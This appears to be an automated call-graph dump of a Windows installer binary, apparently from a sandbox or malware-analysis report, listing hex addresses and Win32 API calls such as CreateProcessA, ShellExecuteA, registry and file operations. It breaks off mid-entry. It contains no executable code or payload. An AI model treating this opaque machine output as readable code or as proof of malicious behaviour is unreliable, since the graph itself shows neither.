4173->4169 4174 4021e3 4175 401456 18 API calls 4174->4175 4176 4021ef 4175->4176 4177 401456 18 API calls 4176->4177 4178 4021fe 4177->4178 4179 402216 4178->4179 4180 401400 18 API calls 4178->4180 4181 40222e 4179->4181 4182 401400 18 API calls 4179->4182 4180->4179 4183 402245 4181->4183 4184 4022c6 4181->4184 4182->4181 4185 401456 18 API calls 4183->4185 4186 401400 18 API calls 4184->4186 4188 40224a 4185->4188 4187 4022cb 4186->4187 4189 401400 18 API calls 4187->4189 4190 401456 18 API calls 4188->4190 4191 4022de FindWindowExA 4189->4191 4192 40225d 4190->4192 4196 402308 4191->4196 4193 4022a9 SendMessageA 4192->4193 4194 402269 SendMessageTimeoutA 4192->4194 4193->4196 4194->4196 4195 402332 4196->4195 4198 407be3 wsprintfA 4196->4198 4198->4195 3379 403164 3380 401400 18 API calls 3379->3380 3381 403170 3380->3381 3386 407a78 GetFileAttributesA CreateFileA 3381->3386 3383 402530 3385 40253c 3383->3385 3387 407be3 wsprintfA 3383->3387 3386->3383 3387->3385 3822 401ae6 3823 401400 18 API calls 3822->3823 3824 401af2 3823->3824 3825 401aff 3824->3825 3826 407ad4 2 API calls 3824->3826 3826->3825 4199 401968 4200 401400 18 API calls 4199->4200 4201 401974 4200->4201 4202 401400 18 API calls 4201->4202 4203 401983 4202->4203 4204 401400 18 API calls 4203->4204 4205 401992 MoveFileA 4204->4205 4206 4019b2 4205->4206 4207 4019a6 4205->4207 4208 408123 2 API calls 4206->4208 4211 402a3c 4206->4211 4209 40163b 23 API calls 4207->4209 4207->4211 4210 4019c7 4208->4210 4209->4211 4210->4211 4212 408311 39 API calls 4210->4212 4212->4207 4213 40236a 4214 401456 18 API calls 4213->4214 4215 402376 4214->4215 4216 401456 18 API calls 4215->4216 4217 402385 GetDlgItem 4216->4217 4218 402530 4217->4218 4221 407be3 wsprintfA 4218->4221 4220 40253c 4221->4220 4222 4019ea 4223 401400 18 API calls 4222->4223 4224 4019f6 GetFullPathNameA 4223->4224 4225 401a25 4224->4225 4226 401a58 4224->4226 4225->4226 4229 408123 2 API calls 4225->4229 4227 403831 4226->4227 4228 401a7b GetShortPathNameA 4226->4228 4228->4227 4230 401a3e 4229->4230 4230->4226 4232 407cb6 lstrcpynA 4230->4232 4232->4226 4233 404fed 4234 405013 4233->4234 4235 405007 4233->4235 4237 405025 GetDlgItem GetDlgItem 4234->4237 4238 40509d 4234->4238 4235->4234 4236 40555f 4235->4236 4239 405564 SetWindowPos 4236->4239 4240 4055a6 4236->4240 4241 404d65 18 API calls 4237->4241 4242 4050c1 4238->4242 4248 403845 2 API calls 4238->4248 4244 4056a8 4239->4244 4245 4055ab ShowWindow 4240->4245 4246 4055cf 4240->4246 4247 405071 SetClassLongA 4241->4247 4243 404bd7 SendMessageA 4242->4243 4254 405134 4242->4254 4285 4050cd 4243->4285 4249 404f0f 8 API calls 4244->4249 4245->4244 4250 4055f1 4246->4250 4251 4055d7 DestroyWindow 4246->4251 4252 403903 2 API calls 4247->4252 4253 4050ef 4248->4253 4249->4254 4256 4055f6 SetWindowLongA 4250->4256 4257 40561c 4250->4257 4255 4053e3 4251->4255 4252->4238 4253->4242 4259 4050f5 SendMessageA 4253->4259 4255->4254 4262 40553d ShowWindow 4255->4262 4256->4254 4257->4244 4258 405628 GetDlgItem 4257->4258 4260 405650 SendMessageA IsWindowEnabled 4258->4260 4261 405641 4258->4261 4259->4254 4260->4254 4260->4261 4265 405693 4261->4265 4267 4056f7 SendMessageA 4261->4267 4269 4056b1 4261->4269 4275 405647 4261->4275 4262->4254 4263 40537a DestroyWindow EndDialog 4263->4255 4264 403903 2 API calls 4264->4285 4265->4267 4265->4275 4266 407e06 18 API calls 4266->4285 4267->4244 4270 4056d3 4269->4270 4271 4056ba 4269->4271 4273 403903 2 API calls 4270->4273 4274 403903 2 API calls 4271->4274 4272 404d65 18 API calls 4272->4285 4273->4275 4274->4275 4275->4244 4302 404cc8 4275->4302 4276 404d65 18 API calls 4277 4051bc GetDlgItem 4276->4277 4278 4051e7 ShowWindow 4277->4278 4277->4285 4278->4285 4280 40525a EnableMenuItem SendMessageA 4281 4052af SendMessageA 4280->4281 4280->4285 4281->4285 4284 4053c8 DestroyWindow 4284->4255 4286 405407 CreateDialogParamA 4284->4286 4285->4254 4285->4263 4285->4264 4285->4266 4285->4272 4285->4276 4285->4278 4285->4280 4285->4284 4290 407e06 18 API calls 4285->4290 4298 404d44 EnableWindow 4285->4298 4299 404c96 SendMessageA 4285->4299 4300 407cb6 lstrcpynA 4285->4300 4301 407cde lstrlenA 4285->4301 4286->4255 4288 405448 4286->4288 4289 404d65 18 API calls 4288->4289 4291 40545f GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4289->4291 4292 405314 SetWindowTextA 4290->4292 4293 403845 2 API calls 4291->4293 4295 403845 2 API calls 4292->4295 4294 4054ee 4293->4294 4294->4254 4296 4054fd ShowWindow 4294->4296 4295->4285 4297 404bd7 SendMessageA 4296->4297 4297->4255 4298->4285 4299->4285 4300->4285 4303 404cd6 4302->4303 4304 404cdc SendMessageA 4302->4304 4303->4304 4304->4244 4305 401771 SetForegroundWindow 4306 40219b 4305->4306 4307 4033f2 4308 403401 4307->4308 4311 40345f 4307->4311 4309 40340f FindNextFileA 4308->4309 4310 403429 4309->4310 4309->4311 4310->4311 4313 407cb6 lstrcpynA 4310->4313 4313->4311 3396 404375 SetErrorMode GetVersion 3397 4043a7 3396->3397 3398 40439b 3396->3398 3400 4043d9 3397->3400 3402 40820e 3 API calls 3397->3402 3399 408299 5 API calls 3398->3399 3399->3397 3401 408299 5 API calls 3400->3401 3403 4043e5 3401->3403 3404 4043c8 lstrlenA 3402->3404 3405 408299 5 API calls 3403->3405 3404->3397 3406 4043f2 InitCommonControls OleInitialize SHGetFileInfoA 3405->3406 3492 407cb6 lstrcpynA 3406->3492 3408 404457 GetCommandLineA 3493 407cb6 lstrcpynA 3408->3493 3410 40446f GetModuleHandleA 3411 404494 3410->3411 3412 4078a4 CharNextA 3411->3412 3413 4044ac CharNextA 3412->3413 3422 4044be 3413->3422 3414 404560 GetTempPathA 3494 4042bc 3414->3494 3417 404580 DeleteFileA 3503 403f03 GetTickCount GetModuleFileNameA 3417->3503 3418 4045a7 GetWindowsDirectoryA 3605 407ce8 lstrcatA 3418->3605 3421 4078a4 CharNextA 3421->3422 3422->3414 3422->3421 3425 404523 3422->3425 3424 4045dd 3595 404316 3424->3595 3604 407cb6 lstrcpynA 3425->3604 3431 40453d 3431->3414 3432 40465b 3533 4060fd 3432->3533 3433 40459a 3433->3424 3433->3432 3437 4078a4 CharNextA 3433->3437 3435 404844 3441 404836 ExitProcess 3435->3441 3442 408299 5 API calls 3435->3442 3436 404826 3623 407836 3436->3623 3439 404608 3437->3439 3444 404662 3439->3444 3446 40461c 3439->3446 3443 40485d 3442->3443 3445 408299 5 API calls 3443->3445 3447 4082eb 5 API calls 3444->3447 3448 40486c 3445->3448 3606 40815b 3446->3606 3450 404667 3447->3450 3451 408299 5 API calls 3448->3451 3622 407ce8 lstrcatA 3450->3622 3454 40487b 3451->3454 3460 4048a1 GetCurrentProcess 3454->3460 3470 4048be 3454->3470 3460->3470 3461 404649 3621 407cb6 lstrcpynA 3461->3621 3462 408299 5 API calls 3471 40493f 3462->3471 3465 404944 ExitWindowsEx 3465->3441 3467 404991 3465->3467 3627 403903 3467->3627 3470->3462 3471->3465 3471->3467 3492->3408 3493->3410 3495 407d37 5 API calls 3494->3495 3496 4042ce 3495->3496 3497 404312 3496->3497 3630 407cf2 lstrlenA CharPrevA 3496->3630 3497->3417 3497->3418 3500 40774b 2 API calls 3501 4042fd 3500->3501 3634 407ad4 3501->3634 3639 407a78 GetFileAttributesA CreateFileA 3503->3639 3505 403f5b 3532 404012 3505->3532 3640 407cb6 lstrcpynA 3505->3640 3507 403f87 3641 4078ce lstrlenA 3507->3641 3511 403fa8 GetFileSize 3530 403fce 3511->3530 3512 4040c3 3648 4039fe 3512->3648 3516 404006 3517 4039fe 31 API calls 3516->3517 3517->3532 3518 404172 GlobalAlloc 3519 404197 3518->3519 3523 407ad4 2 API calls 3519->3523 3521 4039fe 31 API calls 3521->3530 3522 404149 3524 403ae9 ReadFile 3522->3524 3526 4041a7 CreateFileA 3523->3526 3525 40415a 3524->3525 3525->3518 3525->3532 3527 4041f6 3526->3527 3526->3532 3664 403b31 SetFilePointer 3527->3664 3529 404206 3665 403d52 3529->3665 3530->3512 3530->3516 3530->3521 3530->3532 3646 403ae9 ReadFile 3530->3646 3532->3433 3534 408299 5 API calls 3533->3534 3535 406117 3534->3535 3536 406136 3535->3536 3537 40611c 3535->3537 3538 407b3a 3 API calls 3536->3538 3710 407be3 wsprintfA 3537->3710 3539 40616c 3538->3539 3541 4061a4 3539->3541 3543 407b3a 3 API calls 3539->3543 3711 407ce8 lstrcatA 3541->3711 3542 406131 3701 404ae0 3542->3701 3543->3541 3547 40815b 17 API calls 3548 4061e5 3547->3548 3549 4062bc 3548->3549 3551 407b3a 3 API calls 3548->3551 3550 40815b 17 API calls 3549->3550 3552 4062ca 3550->3552 3553 406228 3551->3553 3554 4062e7 LoadImageA 3552->3554 3555 407e06 18 API calls 3552->3555 3553->3549 3559 40625a 3553->3559 3563 4078a4 CharNextA 3553->3563 3556 406405 3554->3556 3557 40632f RegisterClassA 3554->3557 3560 4062e5 3555->3560 3558 403903 2 API calls 3556->3558 3561 406374 SystemParametersInfoA CreateWindowExA 3557->3561 3593 40636d 3557->3593 3562 406411 3558->3562 3712 407cde lstrlenA 3559->3712 3560->3554 3561->3556 3566 404ae0 19 API calls 3562->3566 3562->3593 3563->3559 3570 406421 3566->3570 3573 406513 3570->3573 3574 40642e ShowWindow 3570->3574 3713 404c0d OleInitialize 3573->3713 3578 40820e 3 API calls 3574->3578 3581 406452 3578->3581 3580 40651f 3583 406541 3580->3583 3584 406524 3580->3584 3585 406464 GetClassInfoA 3581->3585 3586 40820e 3 API calls 3581->3586 3587 403903 2 API calls 3583->3587 3590 403903 2 API calls 3584->3590 3584->3593 3588 40648a GetClassInfoA RegisterClassA 3585->3588 3589 4064be DialogBoxParamA 3585->3589 3591 406463 3586->3591 3587->3593 3588->3589 3592 403903 2 API calls 3589->3592 3590->3593 3591->3585 3594 406504 3592->3594 3593->3424 3594->3593 3596 404326 CloseHandle 3595->3596 3597 40433a 3595->3597 3596->3597 3598 404344 CloseHandle 3597->3598 3599 404358 3597->3599 3598->3599 3724 4049da 3599->3724 3604->3431 3815 407cb6 lstrcpynA 3606->3815 3608 408176 3609 407935 3 API calls 3608->3609 3610 408184 3609->3610 3611 40462a 3610->3611 3612 407d37 5 API calls 3610->3612 3611->3424 3620 407cb6 lstrcpynA 3611->3620 3615 408197 3612->3615 3613 4081b7 lstrlenA 3614 4081ea 3613->3614 3613->3615 3617 407cf2 3 API calls 3614->3617 3615->3611 3615->3613 3616 408123 2 API calls 3615->3616 3619 4078ce 2 API calls 3615->3619 3616->3615 3618 4081ef GetFileAttributesA 3617->3618 3618->3611 3619->3615 3620->3461 3621->3432 3624 407850 3623->3624 3625 407855 MessageBoxIndirectA 3623->3625 3624->3625 3626 4078a0 3624->3626 3625->3626 3626->3441 3628 403845 2 API calls 3627->3628 3629 403925 3628->3629 3629->3441 3631 407d1c 3630->3631 3632 4042f0 3630->3632 3638 407ce8 lstrcatA 3631->3638 3632->3500 3635 407ae8 3634->3635 3636 407aeb GetTickCount GetTempFileNameA 3635->3636 3637 407b27 3635->3637 3636->3635 3636->3637 3637->3497 3639->3505 3640->3507 3642 4078e4 3641->3642 3643 4078e9 CharPrevA 3642->3643 3644 403f97 3642->3644 3643->3642 3643->3644 3645 407cb6 lstrcpynA 3644->3645 3645->3511 3647 403b22 3646->3647 3647->3530 3649 403a0b 3648->3649 3650 403a2d 3648->3650 3651 403a14 DestroyWindow 3649->3651 3652 403a1e 3649->3652 3653 403a36 3650->3653 3654 403a48 GetTickCount 3650->3654 3651->3652 3652->3518 3652->3532 3663 403b31 SetFilePointer 3652->3663 3655 408848 2 API calls 3653->3655 3654->3652 3656 403a5a 3654->3656 3655->3652 3657 403a9b CreateDialogParamA ShowWindow 3656->3657 3658 403a63 3656->3658 3659 403a99 3657->3659 3658->3652 3679 40392c MulDiv 3658->3679 3659->3652 3661 403a74 wsprintfA 3662 406fcb 23 API calls 3661->3662 3662->3659 3663->3522 3664->3529 3666 403d92 3665->3666 3667 403d62 SetFilePointer 3665->3667 3680 403b63 GetTickCount 3666->3680 3667->3666 3670 403ea8 3670->3532 3671 403da9 ReadFile 3671->3670 3672 403de2 3671->3672 3672->3670 3673 403b63 41 API calls 3672->3673 3674 403dfe 3673->3674 3674->3670 3675 403eba ReadFile 3674->3675 3677 403e15 3674->3677 3675->3670 3676 403e6b ReadFile 3676->3670 3676->3677 3677->3670 3677->3676 3678 403e23 WriteFile 3677->3678 3678->3670 3678->3677 3679->3661 3681 403b93 3680->3681 3682 403d35 3680->3682 3693 403b31 SetFilePointer 3681->3693 3683 4039fe 31 API calls 3682->3683 3687 403cec 3683->3687 3685 403ba3 SetFilePointer 3692 403be3 3685->3692 3686 403ae9 ReadFile 3686->3692 3687->3670 3687->3671 3689 4039fe 31 API calls 3689->3692 3690 403c98 WriteFile 3690->3687 3690->3692 3691 403d13 SetFilePointer 3691->3682 3692->3686 3692->3687 3692->3689 3692->3690 3692->3691 3694 40893d 3692->3694 3693->3685 3695 408cf0 3694->3695 3698 40896b 3694->3698 3695->3692 3696 408b69 GlobalAlloc 3696->3695 3696->3698 3697 408b4d GlobalFree 3697->3696 3698->3695 3698->3696 3698->3697 3699 408c55 GlobalAlloc 3698->3699 3700 408c45 GlobalFree 3698->3700 3699->3695 3699->3698 3700->3699 3702 404af5 3701->3702 3720 407be3 wsprintfA 3702->3720 3704 404b73 3705 407e06 18 API calls 3704->3705 3706 404b89 SetWindowTextA 3705->3706 3707 404bad 3706->3707 3708 404bcf 3707->3708 3709 407e06 18 API calls 3707->3709 3708->3547 3709->3707 3710->3542 3721 404bd7 3713->3721 3715 404c64 3717 404bd7 SendMessageA 3715->3717 3716 404c41 3716->3715 3718 403845 2 API calls 3716->3718 3719 404c81 OleUninitialize 3717->3719 3718->3716 3719->3580 3720->3704 3722 404be0 SendMessageA 3721->3722 3723 404c0a 3721->3723 3722->3723 3723->3716 3725 4049f4 3724->3725 3726 40435d 3725->3726 3727 4049f9 FreeLibrary GlobalFree 3725->3727 3728 4085b8 3726->3728 3727->3725 3729 40815b 17 API calls 3728->3729 3730 4085cf 3729->3730 3731 4085f3 3730->3731 3732 4085d6 DeleteFileA 3730->3732 3733 404371 OleUninitialize 3731->3733 3735 4087b6 3731->3735 3771 407cb6 lstrcpynA 3731->3771 3732->3733 3733->3435 3733->3436 3735->3733 3776 408123 FindFirstFileA 3735->3776 3736 408625 3738 408630 3736->3738 3739 408648 3736->3739 3779 407ce8 lstrcatA 3738->3779 3742 4078ce 2 API calls 3739->3742 3743 408644 3742->3743 3747 408671 lstrlenA FindFirstFileA 3743->3747 3780 407ce8 lstrcatA 3743->3780 3744 407cf2 3 API calls 3745 4087e2 3744->3745 3746 407a46 2 API calls 3745->3746 3749 4087eb RemoveDirectoryA 3746->3749 3747->3735 3754 4086a7 3747->3754 3752 4087fa 3749->3752 3753 40882c 3749->3753 3751 4078a4 CharNextA 3751->3754 3752->3733 3756 408800 3752->3756 3755 406fcb 23 API calls 3753->3755 3754->3751 3761 40878f FindNextFileA 3754->3761 3765 4085b8 56 API calls 3754->3765 3767 408751 3754->3767 3768 406fcb 23 API calls 3754->3768 3772 407cb6 lstrcpynA 3754->3772 3773 407a46 GetFileAttributesA 3754->3773 3755->3733 3757 406fcb 23 API calls 3756->3757 3758 408810 3757->3758 3759 408311 39 API calls 3758->3759 3760 408822 3759->3760 3760->3733 3761->3754 3763 4087ac FindClose 3761->3763 3763->3735 3765->3754 3767->3754 3769 406fcb 23 API calls 3767->3769 3781 408311 3767->3781 3768->3754 3769->3767 3771->3736 3772->3754 3774 407a71 DeleteFileA 3773->3774 3775 407a5f SetFileAttributesA 3773->3775 3774->3754 3775->3774 3777 408155 3776->3777 3778 408146 FindClose 3776->3778 3777->3733 3777->3744 3778->3777 3782 408299 5 API calls 3781->3782 3783 40832c 3782->3783 3784 408345 3783->3784 3789 4085a8 3783->3789 3807 407a78 GetFileAttributesA CreateFileA 3783->3807 3785 4083b5 GetShortPathNameA 3784->3785 3784->3789 3788 4083d5 3785->3788 3785->3789 3787 40837d CloseHandle GetShortPathNameA 3787->3784 3787->3789 3788->3789 3790 4083e0 wsprintfA 3788->3790 3789->3767 3791 407e06 18 API calls 3790->3791 3792 408423 3791->3792 3808 407a78 GetFileAttributesA CreateFileA 3792->3808 3794 408441 3794->3789 3795 40844f GetFileSize GlobalAlloc 3794->3795 3796 408488 ReadFile 3795->3796 3797 40859e CloseHandle 3795->3797 3796->3797 3798 4084b3 3796->3798 3797->3789 3798->3797 3809 4079b4 lstrlenA 3798->3809 3801 4084d2 3814 407cb6 lstrcpynA 3801->3814 3802 4084ee 3804 4079b4 3 API calls 3802->3804 3805 4084e8 3804->3805 3806 408547 SetFilePointer WriteFile GlobalFree 3805->3806 3806->3797 3807->3787 3808->3794 3810 4079d4 3809->3810 3811 4079df lstrcmpiA 3810->3811 3812 407a05 3810->3812 3811->3812 3813 407a09 CharNextA 3811->3813 3812->3801 3812->3802 3813->3810 3814->3805 3815->3608 4314 403376 4315 401456 18 API calls 4314->4315 4316 403394 4315->4316 4317 40339f SetFilePointer 4316->4317 4320 4033c9 4317->4320 4318 401456 18 API calls 4318->4320 4319 4037a0 4321 402a3c 4319->4321 4322 407e06 18 API calls 4319->4322 4320->4318 4320->4319 4320->4321 4322->4321 4323 4017f7 4324 402530 4323->4324 4327 407be3 wsprintfA 4324->4327 4326 40253c 4327->4326 4335 40247c GetDC GetDeviceCaps 4336 401456 18 API calls 4335->4336 4337 4024ad MulDiv 4336->4337 4338 401456 18 API calls 4337->4338 4339 4024d9 4338->4339 4340 407e06 18 API calls 4339->4340 4341 402520 CreateFontIndirectA 4340->4341 4342 40252f 4341->4342 4345 407be3 wsprintfA 4342->4345 4344 40253c 4345->4344 4346 40367d 4347 401456 18 API calls 4346->4347 4348 403689 4347->4348 4349 4036ae 4348->4349 4350 4036df 4348->4350 4355 402a3c 4348->4355 4351 4036b0 4349->4351 4352 4036ca 4349->4352 4353 403700 4350->4353 4354 4036eb 4350->4354 4362 407cb6 lstrcpynA 4351->4362 4352->4355 4359 401456 18 API calls 4352->4359 4360 4037a0 4352->4360 4357 407e06 18 API calls 4353->4357 4356 401456 18 API calls 4354->4356 4356->4355 4357->4355 4359->4352 4360->4355 4361 407e06 18 API calls 4360->4361 4361->4355 4362->4355 4363 401000 4364 401032 BeginPaint GetClientRect 4363->4364 4365 401017 DefWindowProcA 4363->4365 4367 401078 4364->4367 4370 401212 4365->4370 4368 401130 4367->4368 4369 401084 CreateBrushIndirect FillRect DeleteObject 4367->4369 4371 40113a CreateFontIndirectA 4368->4371 4372 4011db EndPaint 4368->4372 4369->4367 4371->4372 4373 401151 6 API calls 4371->4373 4372->4370 4373->4372 4381 401803 4382 40181c 4381->4382 4383 40180d ShowWindow 4381->4383 4384 40256d ShowWindow 4382->4384 4385 4037d4 4382->4385 4383->4382 4384->4385 4386 402583 4387 401400 18 API calls 4386->4387 4388 40258f 4387->4388 4389 401400 18 API calls 4388->4389 4390 40259e 4389->4390 4391 401400 18 API calls 4390->4391 4392 4025ad 4391->4392 4393 401400 18 API calls 4392->4393 4394 4025bc 4393->4394 4395 40163b 23 API calls 4394->4395 4396 4025c9 ShellExecuteA 4395->4396 3827 401b06 3828 401400 18 API calls 3827->3828 3829 401b12 3828->3829 3830 401b2b 3829->3830 3831 401b3d 3829->3831 3872 407cb6 lstrcpynA 3830->3872 3873 407cb6 lstrcpynA 3831->3873 3834 401b3b 3838 407d37 5 API calls 3834->3838 3835 401b51 3836 407cf2 3 API calls 3835->3836 3837 401b5b 3836->3837 3874 407ce8 lstrcatA 3837->3874 3840 401b76 3838->3840 3841 408123 2 API calls 3840->3841 3858 401ba9 3840->3858 3843 401b88 3841->3843 3842 407a46 2 API calls 3842->3858 3845 401b91 CompareFileTime 3843->3845 3843->3858 3845->3858 3846 401cce 3848 406fcb 23 API calls 3846->3848 3847 401c05 3849 406fcb 23 API calls 3847->3849 3850 401cde 3848->3850 3852 401c15 3849->3852 3851 403d52 46 API calls 3850->3851 3853 401d08 3851->3853 3855 401d25 SetFileTime 3853->3855 3857 401d47 FindCloseChangeNotification 3853->3857 3854 407cb6 lstrcpynA 3854->3858 3855->3857 3856 407e06 18 API calls 3856->3858 3857->3852 3859 401d59 3857->3859 3858->3842 3858->3846 3858->3847 3858->3854 3858->3856 3864 407836 MessageBoxIndirectA 3858->3864 3868 401ca5 3858->3868 3871 407a78 GetFileAttributesA CreateFileA 3858->3871 3860 401d86 3859->3860 3861 401d5e 3859->3861 3863 407e06 18 API calls 3860->3863 3862 407e06 18 API calls 3861->3862 3865 401d72 3862->3865 3866 401d84 3863->3866 3864->3858 3875 407ce8 lstrcatA 3865->3875 3869 407836 MessageBoxIndirectA 3866->3869 3868->3852 3870 406fcb 23 API calls 3868->3870 3869->3852 3870->3852 3871->3858 3872->3834 3873->3835 4404 402008 4405 401456 18 API calls 4404->4405 4406 402016 4405->4406 4407 401456 18 API calls 4406->4407 4409 402025 4407->4409 4411 407be3 wsprintfA 4409->4411 4410 402332 4411->4410 4412 401f08 4413 401400 18 API calls 4412->4413 4414 401f14 4413->4414 4415 401400 18 API calls 4414->4415 4416 401f23 4415->4416 4417 401f34 lstrcmpiA 4416->4417 4418 401f3c lstrcmpA 4416->4418 4419 401f42 4417->4419 4418->4419 4420 402988 4421 401400 18 API calls 4420->4421 4422 402994 4421->4422 4423 401400 18 API calls 4422->4423 4424 4029a7 4423->4424 4425 401400 18 API calls 4424->4425 4426 4029b6 4425->4426 4427 401400 18 API calls 4426->4427 4428 4029c9 4427->4428 4429 401400 18 API calls 4428->4429 4431 4029d8 4429->4431 4430 4029f9 CoCreateInstance 4433 402a2f 4430->4433 4439 402a46 4430->4439 4431->4430 4432 401400 18 API calls 4431->4432 4434 4029f8 4432->4434 4435 40163b 23 API calls 4433->4435 4434->4430 4437 402a3b 4435->4437 4436 402bc5 4438 40163b 23 API calls 4436->4438 4438->4437 4440 402b39 MultiByteToWideChar 4439->4440 4441 402b7c 4439->4441 4440->4441 4441->4433 4441->4436 4442 403089 4451 4015b0 4442->4451 4444 403095 4445 401456 18 API calls 4444->4445 4446 4030a4 4445->4446 4447 4030e5 RegEnumValueA 4446->4447 4448 4030c7 RegEnumKeyA 4446->4448 4449 402a3c 4446->4449 4447->4449 4450 40312b RegCloseKey 4447->4450 4448->4450 4450->4449 4452 401400 18 API calls 4451->4452 4453 4015cc RegOpenKeyExA 4452->4453 4453->4444 4455 40710b 4456 4073a5 4455->4456 4471 40712c 4455->4471 4457 407404 4456->4457 4458 4073ad GetDlgItem CreateThread CloseHandle 4456->4458 4459 40740c 4457->4459 4460 40744f 4457->4460 4461 4074ba 4458->4461 4462 407418 ShowWindow ShowWindow 4459->4462 4463 407449 4459->4463 4460->4461 4466 407473 ShowWindow 4460->4466 4476 407460 4460->4476 4461->4463 4468 4074cd SendMessageA 4461->4468 4503 404c96 SendMessageA 4462->4503 4464 404f0f 8 API calls 4463->4464 4467 407687 4464->4467 4469 407494 4466->4469 4466->4476 4468->4467 4470 4074fc CreatePopupMenu 4468->4470 4472 406fcb 23 API calls 4469->4472 4474 407e06 18 API calls 4470->4474 4501 404c96 SendMessageA 4471->4501 4472->4476 4473 404cc8 SendMessageA 4473->4461 4477 407518 AppendMenuA 4474->4477 4476->4473 4479 407540 GetWindowRect 4477->4479 4480 40755a 4477->4480 4478 4071b9 4482 4071c6 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4478->4482 4481 407564 TrackPopupMenu 4479->4481 4480->4481 4481->4467 4483 40759e 4481->4483 4484 407247 SendMessageA SendMessageA 4482->4484 4485 40727f 4482->4485 4489 4075c4 SendMessageA 4483->4489 4490 4075ec OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4483->4490 4484->4485 4486 407285 SendMessageA 4485->4486 4487 4072a8 4485->4487 4486->4487 4488 404d65 18 API calls 4487->4488 4491 4072c5 4488->4491 4489->4483 4492 40762a SendMessageA 4490->4492 4493 4072d1 ShowWindow 4491->4493 4494 40731c SendMessageA 4491->4494 4492->4492 4495 407664 GlobalUnlock SetClipboardData CloseClipboard 4492->4495 4496 4072f4 ShowWindow 4493->4496 4497 407305 4493->4497 4494->4467 4500 407365 SendMessageA SendMessageA 4494->4500 4495->4467 4496->4497 4502 404c96 SendMessageA 4497->4502 4500->4467 4501->4478 4502->4494 4503->4463 4504 403491 4505 401400 18 API calls 4504->4505 4507 40349d 4505->4507 4506 4034b9 4509 407a46 2 API calls 4506->4509 4507->4506 4508 401400 18 API calls 4507->4508 4508->4506 4510 4034c2 4509->4510 4531 407a78 GetFileAttributesA CreateFileA 4510->4531 4512 4034db 4513 403500 GlobalAlloc 4512->4513 4514 4034e7 DeleteFileA 4512->4514 4516 403644 CloseHandle 4513->4516 4517 40352f 4513->4517 4515 403668 4514->4515 4520 40163b 23 API calls 4515->4520 4523 403677 4515->4523 4516->4514 4516->4515 4532 403b31 SetFilePointer 4517->4532 4519 40353b 4521 403ae9 ReadFile 4519->4521 4520->4523 4522 40354e GlobalAlloc 4521->4522 4524 40356b 4522->4524 4525 4035dd WriteFile GlobalFree 4522->4525 4527 403d52 46 API calls 4524->4527 4526 403d52 46 API calls 4525->4526 4528 40363f 4526->4528 4530 40358f 4527->4530 4528->4516 4529 4035d3 GlobalFree 4529->4525 4530->4529 4531->4512 4532->4519 3355 402613 3356 401400 18 API calls 3355->3356 3357 40261f 3356->3357 3358 406fcb 23 API calls 3357->3358 3359 402632 3358->3359 3371 407779 CreateProcessA 3359->3371 3361 4026b1 CloseHandle 3364 403677 3361->3364 3367 402a3c 3361->3367 3363 402656 WaitForSingleObject 3365 40267b GetExitCodeProcess 3363->3365 3366 40263c 3363->3366 3364->3367 3365->3361 3369 402699 3365->3369 3366->3361 3366->3363 3366->3367 3374 408848 3366->3374 3378 407be3 wsprintfA 3369->3378 3372 4077f5 3371->3372 3373 4077e5 CloseHandle 3371->3373 3372->3366 3373->3372 3375 40885d PeekMessageA 3374->3375 3376 408881 DispatchMessageA 3375->3376 3377 40888d 3375->3377 3376->3375 3377->3366 3378->3361 3388 401714 3389 40171c 3388->3389 3392 403845 3389->3392 3394 403854 3392->3394 3393 40172e 3394->3393 3395 4038a0 MulDiv SendMessageA 3394->3395 3395->3394 4540 406614 GetDlgItem GetDlgItem 4541 406671 7 API calls 4540->4541 4546 4069d1 4540->4546 4542 406797 DeleteObject 4541->4542 4543 406777 SendMessageA 4541->4543 4544 4067b0 4542->4544 4543->4542 4549 40681b 4544->4549 4551 407e06 18 API calls 4544->4551 4545 406af3 4547 406b30 4545->4547 4548 406bf6 4545->4548 4546->4545 4550 406a56 4546->4550 4556 406557 4 API calls 4546->4556 4557 406b49 SendMessageA 4547->4557 4583 4069cb 4547->4583 4553 406c28 4548->4553 4554 406bff SendMessageA 4548->4554 4552 404d65 18 API calls 4549->4552 4550->4545 4560 406ad0 SendMessageA 4550->4560 4569 406c7a 4550->4569 4555 4067d9 SendMessageA SendMessageA 4551->4555 4558 40683e 4552->4558 4561 406c31 4553->4561 4553->4569 4554->4583 4555->4544 4556->4550 4562 406b7b SendMessageA 4557->4562 4557->4583 4563 404d65 18 API calls 4558->4563 4559 404f0f 8 API calls 4564 406eca 4559->4564 4560->4545 4565 406c44 4561->4565 4566 406c3a ImageList_Destroy 4561->4566 4568 406ba1 4562->4568 4573 40685d 4563->4573 4567 406c4d GlobalFree 4565->4567 4565->4583 4566->4565 4567->4583 4574 406bbf SendMessageA 4568->4574 4572 403903 2 API calls 4569->4572 4586 406caf 4569->4586 4591 406e5e 4569->4591 4570 406e73 ShowWindow GetDlgItem ShowWindow 4570->4583 4571 40696b 4575 406971 GetWindowLongA SetWindowLongA 4571->4575 4576 40699f 4571->4576 4572->4586 4573->4571 4579 4068b2 SendMessageA 4573->4579 4580 406902 SendMessageA 4573->4580 4581 406926 SendMessageA 4573->4581 4574->4569 4575->4576 4577 4069c3 4576->4577 4578 4069a5 ShowWindow 4576->4578 4592 404c96 SendMessageA 4577->4592 4578->4577 4579->4573 4580->4573 4581->4573 4583->4559 4584 406e0a InvalidateRect 4585 406e31 4584->4585 4584->4591 4589 404da2 21 API calls 4585->4589 4587 406ced SendMessageA 4586->4587 4588 406d17 4586->4588 4587->4588 4588->4584 4590 406da4 SendMessageA SendMessageA 4588->4590 4589->4591 4590->4588 4591->4570 4591->4583 4592->4583 4593 40239a 4594 401456 18 API calls 4593->4594 4595 4023ae SetWindowLongA 4594->4595 4596 40382c 4595->4596 4597 402f9d 4598 4015b0 19 API calls 4597->4598 4599 402fa9 4598->4599 4600 401400 18 API calls 4599->4600 4601 402fbc 4600->4601 4602 402fd1 RegQueryValueExA 4601->4602 4603 402a3c 4601->4603 4604 403015 4602->4604 4605 403025 RegCloseKey 4602->4605 4604->4605 4608 407be3 wsprintfA 4604->4608 4605->4603 4608->4605 4609 401a9e 4610 401400 18 API calls 4609->4610 4611 401aaa SearchPathA 4610->4611 4612 402dab 4611->4612 4613 40319e 4614 4031c0 4613->4614 4615 4031a7 4613->4615 4617 401400 18 API calls 4614->4617 4616 401456 18 API calls 4615->4616 4619 4031b3 4616->4619 4618 4031cc 4617->4618 4623 407cde lstrlenA 4618->4623 4621 403831 4619->4621 4622 